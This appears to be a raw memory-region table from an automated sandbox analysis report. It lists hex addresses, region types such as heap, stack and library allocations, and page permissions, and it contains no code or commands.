page read and write
1A7C6817000
heap
page read and write
1EF4FDF7000
heap
page read and write
2179EC8B000
trusted library allocation
page read and write
1A7C48D0000
heap
page read and write
21790065000
trusted library allocation
page read and write
561753C000
stack
page read and write
2459377B000
heap
page read and write
2390B9F0000
heap
page execute and read and write
2459179D000
heap
page read and write
2459361B000
heap
page read and write
1AA5184C000
trusted library allocation
page read and write
174D4ED4000
trusted library allocation
page read and write
2103F292000
trusted library allocation
page read and write
7FF83B980000
trusted library allocation
page execute and read and write
1A7C6855000
heap
page read and write
1C4D0290000
heap
page read and write
7FF83B7DD000
trusted library allocation
page execute and read and write
245919CA000
heap
page read and write
2390A110000
heap
page read and write
1C4D04CC000
heap
page read and write
7FF83B9D0000
trusted library allocation
page read and write
2080F7A0000
trusted library allocation
page read and write
2103DBA0000
heap
page execute and read and write
1ECD69DA000
trusted library allocation
page read and write
245935C5000
heap
page read and write
7FF83BAE0000
trusted library allocation
page read and write
24593D12000
heap
page read and write
174D2EB0000
heap
page read and write
7FF83B9B2000
trusted library allocation
page read and write
1C4CE1EC000
heap
page read and write
7FF83B981000
trusted library allocation
page read and write
7FF83B9D0000
trusted library allocation
page read and write
174D4EFE000
trusted library allocation
page read and write
2390C5BF000
trusted library allocation
page read and write
1EF4FD79000
heap
page read and write
7FF83BB10000
trusted library allocation
page read and write
1EF4FF30000
heap
page read and write
1A7C67E8000
heap
page read and write
217A6AC1000
heap
page read and write
1C4D07FA000
heap
page read and write
1C4D0040000
heap
page read and write
1BA5ABCD000
trusted library allocation
page read and write
1C4D004A000
heap
page read and write
1A7C6829000
heap
page read and write
23924390000
heap
page read and write
139D8A10000
heap
page read and write
2546B78D000
heap
page read and write
7FF83BAA0000
trusted library allocation
page read and write
139D8C00000
heap
page read and write
2104DD6D000
trusted library allocation
page read and write
91B1437000
stack
page read and write
561737E000
stack
page read and write
1A7C6BE1000
heap
page read and write
5399CF9000
stack
page read and write
1C4D02B2000
heap
page read and write
1EF4FF34000
heap
page read and write
245916FE000
heap
page read and write
24593A45000
heap
page read and write
1BA5AABE000
trusted library allocation
page read and write
1C4CE1B0000
heap
page read and write
2103D6F0000
heap
page readonly
18C000FF000
trusted library allocation
page read and write
20827D7B000
heap
page read and write
21055D05000
heap
page read and write
7FF83B7DD000
trusted library allocation
page execute and read and write
7FF83BA20000
trusted library allocation
page read and write
24593A83000
heap
page read and write
1C4CFFF1000
heap
page read and write
2546B782000
heap
page read and write
1A7C48A0000
heap
page read and write
1A8DDB30000
heap
page read and write
21790073000
trusted library allocation
page read and write
1C4CE1AE000
heap
page read and write
18C71CA2000
heap
page read and write
1C4D003C000
heap
page read and write
18C71BE0000
heap
page read and write
1898015B000
trusted library allocation
page read and write
1A7C67E3000
heap
page read and write
2459173A000
heap
page read and write
18C6FC60000
heap
page read and write
20827E20000
heap
page execute and read and write
7FF83B9E0000
trusted library allocation
page read and write
883D38E000
stack
page read and write
7FF83BAD0000
trusted library allocation
page read and write
BF5470E000
stack
page read and write
7FF83BA91000
trusted library allocation
page read and write
7FF83BA30000
trusted library allocation
page read and write
1C4CE16B000
heap
page read and write
1C4CE130000
heap
page read and write
24593AA8000
heap
page read and write
204E7C59000
heap
page read and write
7FF83BAE0000
trusted library allocation
page read and write
7FF83B960000
trusted library allocation
page execute and read and write
7FF83BA70000
trusted library allocation
page read and write
1C4CE21B000
heap
page read and write
1A8F7B5E000
heap
page read and write
2546B774000
heap
page read and write
7FF83B7D0000
trusted library allocation
page read and write
7FF83BA30000
trusted library allocation
page read and write
1A7C6837000
heap
page read and write
7FF83BA50000
trusted library allocation
page read and write
883C2FF000
stack
page read and write
7FF83BAC0000
trusted library allocation
page read and write
7FF83BA60000
trusted library allocation
page read and write
139D8A3E000
heap
page read and write
7FF83B97A000
trusted library allocation
page read and write
91B12FE000
stack
page read and write
24593A14000
heap
page read and write
1C4CE19D000
heap
page read and write
2080DE30000
trusted library allocation
page read and write
1A7C6A63000
heap
page read and write
7FF83BA00000
trusted library allocation
page read and write
174D2FD0000
heap
page execute and read and write
1C4D07DB000
heap
page read and write
24591788000
heap
page read and write
24593A94000
heap
page read and write
7FF83B7A3000
trusted library allocation
page execute and read and write
1A8F7BB6000
heap
page read and write
1C4D04C6000
heap
page read and write
24593A8C000
heap
page read and write
2546B798000
heap
page read and write
2546B779000
heap
page read and write
1C4D04EC000
heap
page read and write
23923FE0000
heap
page read and write
57694FC000
stack
page read and write
1ECEE540000
heap
page read and write
7FF83B870000
trusted library allocation
page read and write
1BA5AB16000
trusted library allocation
page read and write
2DB4A800000
heap
page read and write
7FF83B7AD000
trusted library allocation
page execute and read and write
1C4D0867000
heap
page read and write
2DB327FA000
trusted library allocation
page read and write
7FF83B9A0000
trusted library allocation
page read and write
7FF83B79D000
trusted library allocation
page execute and read and write
539AACE000
stack
page read and write
7FF83B8E0000
trusted library allocation
page execute and read and write
7FF83BA30000
trusted library allocation
page read and write
204E7F76000
heap
page read and write
204E7CA3000
heap
page read and write
1ECD45C0000
heap
page read and write
7FF83B850000
trusted library allocation
page execute and read and write
1ECEE581000
heap
page read and write
1FBCB39B000
heap
page read and write
5768BA5000
stack
page read and write
1EF69EA0000
heap
page read and write
208108E3000
trusted library allocation
page read and write
7FF83BA20000
trusted library allocation
page read and write
245935EF000
heap
page read and write
1AA69A70000
heap
page execute and read and write
7FF83BA70000
trusted library allocation
page read and write
2080DE7E000
heap
page read and write
7FF83B97A000
trusted library allocation
page read and write
1C4D04D5000
heap
page read and write
1A8F7C40000
heap
page read and write
2103D6E0000
trusted library allocation
page read and write
245935C0000
heap
page read and write
1AA51CA9000
trusted library allocation
page read and write
1C4D07DD000
heap
page read and write
1FBCB350000
heap
page read and write
2104DC2A000
trusted library allocation
page read and write
245917A3000
heap
page read and write
1A8F7BED000
heap
page read and write
1A8DDC50000
trusted library allocation
page read and write
1C4CE4ED000
heap
page read and write
204E7C71000
heap
page read and write
1EF5331F000
trusted library allocation
page read and write
1C4D07CD000
heap
page read and write
189FC026000
heap
page read and write
18980573000
trusted library allocation
page read and write
7FF83B97A000
trusted library allocation
page read and write
7FF83B7F0000
trusted library allocation
page read and write
2390BF95000
trusted library allocation
page read and write
174ECDCC000
heap
page read and write
1C4D04B4000
heap
page read and write
18980153000
trusted library allocation
page read and write
2103C080000
heap
page read and write
1A7C6855000
heap
page read and write
1C4D0484000
heap
page read and write
7FF83B932000
trusted library allocation
page read and write
7FF83BB10000
trusted library allocation
page read and write
1C4D04D1000
heap
page read and write
1C4CE4E5000
heap
page read and write
1C4CFFF4000
heap
page read and write
64F58FF000
stack
page read and write
1BA5B0C2000
trusted library allocation
page read and write
174ECFB0000
heap
page read and write
2459363F000
heap
page read and write
1BA72D2B000
heap
page read and write
7FF83BAB0000
trusted library allocation
page read and write
7FF83B794000
trusted library allocation
page read and write
21055D79000
heap
page read and write
24593629000
heap
page read and write
1BA5A730000
heap
page read and write
7FF83B9F0000
trusted library allocation
page read and write
2103C084000
heap
page read and write
561717F000
stack
page read and write
7FF83BA20000
trusted library allocation
page read and write
1BA5AB85000
trusted library allocation
page read and write
1C4CFFDD000
heap
page read and write
1EF6A015000
heap
page read and write
204E7CA7000
heap
page read and write
2103BD0F000
heap
page read and write
7FF83BAB0000
trusted library allocation
page read and write
1BA5AE7D000
trusted library allocation
page read and write
2390BA80000
heap
page read and write
2103DA50000
trusted library allocation
page read and write
24591732000
heap
page read and write
7FF83B8B6000
trusted library allocation
page execute and read and write
1C4D0110000
heap
page read and write
139D8AB0000
heap
page read and write
1AA51410000
heap
page execute and read and write
7FF83BAD0000
trusted library allocation
page read and write
2178EA1E000
trusted library allocation
page read and write
2546B7B8000
heap
page read and write
2459176C000
heap
page read and write
2178FFCD000
trusted library allocation
page read and write
1AA517B1000
trusted library allocation
page read and write
1A8DFA00000
heap
page execute and read and write
217A6BAC000
heap
page read and write
217A6B5A000
heap
page read and write
1A7C49DF000
heap
page read and write
2178CC60000
heap
page read and write
245935F9000
heap
page read and write
1C4D002C000
heap
page read and write
139D8C20000
heap
page read and write
1C4CE1C0000
heap
page read and write
18C6FC80000
heap
page read and write
2546BA20000
heap
page read and write
21055CC0000
heap
page read and write
1ECD4411000
heap
page read and write
7FF83B9E0000
trusted library allocation
page read and write
204E7484000
heap
page read and write
2546BC39000
heap
page read and write
1C4CE1EC000
heap
page read and write
1A7C6C1D000
heap
page read and write
7FF83BA00000
trusted library allocation
page read and write
208281C2000
heap
page read and write
2DB30853000
heap
page read and write
7FF83B84C000
trusted library allocation
page execute and read and write
7FF83B971000
trusted library allocation
page read and write
9FC3C78000
stack
page read and write
2081FCB1000
trusted library allocation
page read and write
1EF4FE70000
heap
page read and write
2459176C000
heap
page read and write
1BA73150000
heap
page read and write
7FF83B880000
trusted library allocation
page read and write
18990001000
trusted library allocation
page read and write
2546BB30000
remote allocation
page read and write
2DB3274D000
trusted library allocation
page read and write
1A7C6C23000
heap
page read and write
1A7C6A50000
heap
page read and write
883BFDF000
stack
page read and write
7FF83BA00000
trusted library allocation
page read and write
24593648000
heap
page read and write
139D8AB0000
heap
page read and write
1C4D0481000
heap
page read and write
7FF83B9C0000
trusted library allocation
page read and write
1A7C680B000
heap
page read and write
245917A3000
heap
page read and write
189FBFAA000
heap
page read and write
24593605000
heap
page read and write
7FF83B7FC000
trusted library allocation
page execute and read and write
2546BA30000
heap
page read and write
53997CE000
stack
page read and write
7FF83BAE0000
trusted library allocation
page read and write
1BA6AA91000
trusted library allocation
page read and write
1A7C49D0000
heap
page read and write
1A7C4908000
heap
page read and write
1A7C67DD000
heap
page read and write
1C4D07D7000
heap
page read and write
7FF83BA8A000
trusted library allocation
page read and write
7FF83BA90000
trusted library allocation
page read and write
1C4D04EE000
heap
page read and write
2DB309C0000
heap
page read and write
7FF83B886000
trusted library allocation
page read and write
1FBCB520000
heap
page read and write
1C4CE1A7000
heap
page read and write
1AA4FA70000
heap
page read and write
1BA5AACA000
trusted library allocation
page read and write
98D60F5000
stack
page read and write
91B17BB000
stack
page read and write
7FF83B7E0000
trusted library allocation
page read and write
2390C430000
trusted library allocation
page read and write
1BA58DAB000
heap
page read and write
174ECD80000
heap
page read and write
91B117C000
stack
page read and write
1FBCB356000
heap
page read and write
2546BB60000
heap
page read and write
7FF83B980000
trusted library allocation
page execute and read and write
245935D2000
heap
page read and write
2081FCC1000
trusted library allocation
page read and write
1A7C6805000
heap
page read and write
174ECFD8000
heap
page read and write
174D2E50000
heap
page read and write
1BA58D4B000
heap
page read and write
24593648000
heap
page read and write
1C4CFFE4000
heap
page read and write
2459172F000
heap
page read and write
189FBF50000
heap
page read and write
24591747000
heap
page read and write
91B11FE000
stack
page read and write
1C4D002C000
heap
page read and write
2546B798000
heap
page read and write
204E7463000
heap
page read and write
245916F8000
heap
page read and write
2546BC2A000
heap
page read and write
139D8A4F000
heap
page read and write
1C4D0445000
heap
page read and write
1ECD64AB000
trusted library allocation
page read and write
7FF83B793000
trusted library allocation
page execute and read and write
1BA58D06000
heap
page read and write
7FF83B880000
trusted library allocation
page execute and read and write
2392405A000
heap
page read and write
2546BC42000
heap
page read and write
174D4C1F000
trusted library allocation
page read and write
7FF83B87C000
trusted library allocation
page execute and read and write
204E74C3000
heap
page read and write
7FF83B7D0000
trusted library allocation
page read and write
1A8F7B5C000
heap
page read and write
1AA4F7C0000
heap
page read and write
139D8A86000
heap
page read and write
64F59FC000
stack
page read and write
1ECEE530000
heap
page execute and read and write
2459172F000
heap
page read and write
239240F6000
heap
page execute and read and write
2103E7DE000
trusted library allocation
page read and write
174ECFD1000
heap
page read and write
18C71C56000
heap
page read and write
1898005E000
trusted library allocation
page read and write
2DB30A20000
heap
page read and write
2546B730000
heap
page read and write
2081199B000
trusted library allocation
page read and write
7FF83B9F0000
trusted library allocation
page read and write
204E7F71000
heap
page read and write
20827F50000
heap
page execute and read and write
7FF83B84C000
trusted library allocation
page execute and read and write
1C4CE1AC000
heap
page read and write
1C4D0482000
heap
page read and write
1A7C6A56000
heap
page read and write
1FBCD3DA000
trusted library allocation
page read and write
7FF83B7C4000
trusted library allocation
page read and write
7FF83B9E0000
trusted library allocation
page read and write
139D8A88000
heap
page read and write
1EF51EA3000
trusted library allocation
page read and write
7FF83B87C000
trusted library allocation
page execute and read and write
24593D32000
heap
page read and write
7FF83B850000
trusted library allocation
page execute and read and write
2DB308B2000
heap
page read and write
204E7458000
heap
page read and write
955B77F000
stack
page read and write
1A8DDB70000
heap
page read and write
7FF83B932000
trusted library allocation
page read and write
7FF83BA60000
trusted library allocation
page read and write
189FDFA8000
heap
page read and write
7FF83B9E0000
trusted library allocation
page read and write
7FF83BA40000
trusted library allocation
page read and write
1EF61CE8000
trusted library allocation
page read and write
2546B7B8000
heap
page read and write
189FC170000
heap
page read and write
245935C5000
heap
page read and write
7FF83B9F0000
trusted library allocation
page read and write
7FF83B7C0000
trusted library allocation
page read and write
2546B7B8000
heap
page read and write
2546BF37000
heap
page read and write
883C37D000
stack
page read and write
2178CB7D000
heap
page read and write
1EF51C60000
heap
page read and write
5399BFE000
stack
page read and write
2DB4A8C5000
heap
page read and write
7FF83BA10000
trusted library allocation
page read and write
2546B744000
heap
page read and write
2390C4DD000
trusted library allocation
page read and write
24593ABE000
heap
page read and write
7FF7A1980000
unkown
page read and write
245935CA000
heap
page read and write
204E74B4000
heap
page read and write
2546BC55000
heap
page read and write
245919C5000
heap
page read and write
7FF83BA80000
trusted library allocation
page read and write
204E74B0000
heap
page read and write
2178CB49000
heap
page read and write
1C4D048A000
heap
page read and write
1BA58CC0000
heap
page read and write
955B87E000
stack
page read and write
24593A7C000
heap
page read and write
1BA72BF0000
heap
page execute and read and write
24593A68000
heap
page read and write
1BA72CA4000
heap
page read and write
64F52F5000
stack
page read and write
139D8A5E000
heap
page read and write
24593D68000
heap
page read and write
1C4CE1E5000
heap
page read and write
2546BB7F000
heap
page read and write
2546B798000
heap
page read and write
2391BF20000
trusted library allocation
page read and write
1EF4FEC0000
trusted library allocation
page read and write
2546BC50000
heap
page read and write
7FF83B87C000
trusted library allocation
page execute and read and write
2DB32210000
heap
page read and write
204E7C5C000
heap
page read and write
1C4D04D1000
heap
page read and write
1A7C6826000
heap
page read and write
1A7C6829000
heap
page read and write
1A7C4C95000
heap
page read and write
2459171E000
heap
page read and write
254699B6000
heap
page read and write
1C4D084D000
heap
page read and write
1C4D07D8000
heap
page read and write
1BA5AB0E000
trusted library allocation
page read and write
1C4CE1C9000
heap
page read and write
85F407E000
stack
page read and write
1EF61F62000
trusted library allocation
page read and write
204E7F7B000
heap
page read and write
21055DE0000
heap
page execute and read and write
174D5022000
trusted library allocation
page read and write
91B127F000
stack
page read and write
F5098FE000
stack
page read and write
1A7C6830000
heap
page read and write
2D4A37E000
stack
page read and write
7FF83B890000
trusted library allocation
page execute and read and write
18980114000
trusted library allocation
page read and write
7FF83B9B0000
trusted library allocation
page execute and read and write
9FC49CD000
stack
page read and write
1C4D0004000
heap
page read and write
139D8C40000
remote allocation
page read and write
24593D38000
heap
page read and write
1A8DDCE0000
heap
page read and write
24593A9A000
heap
page read and write
7FF83BA10000
trusted library allocation
page read and write
24591746000
heap
page read and write
204E7C63000
heap
page read and write
7FF83BAA0000
trusted library allocation
page read and write
1C4CE4E9000
heap
page read and write
1FBCD828000
trusted library allocation
page read and write
1A7C6470000
heap
page read and write
2080FEE3000
trusted library allocation
page read and write
245917AB000
heap
page read and write
217A6DCC000
heap
page read and write
7FF83BA50000
trusted library allocation
page read and write
1C4D02B2000
heap
page read and write
2546B781000
heap
page read and write
7FF83BAD0000
trusted library allocation
page read and write
1C4D0021000
heap
page read and write
1006BE000
stack
page read and write
217A6E43000
heap
page read and write
1AA517C2000
trusted library allocation
page read and write
FE1ACFE000
stack
page read and write
139D8A45000
heap
page read and write
24593A8F000
heap
page read and write
There are 2886 hidden memdumps, click here to show them.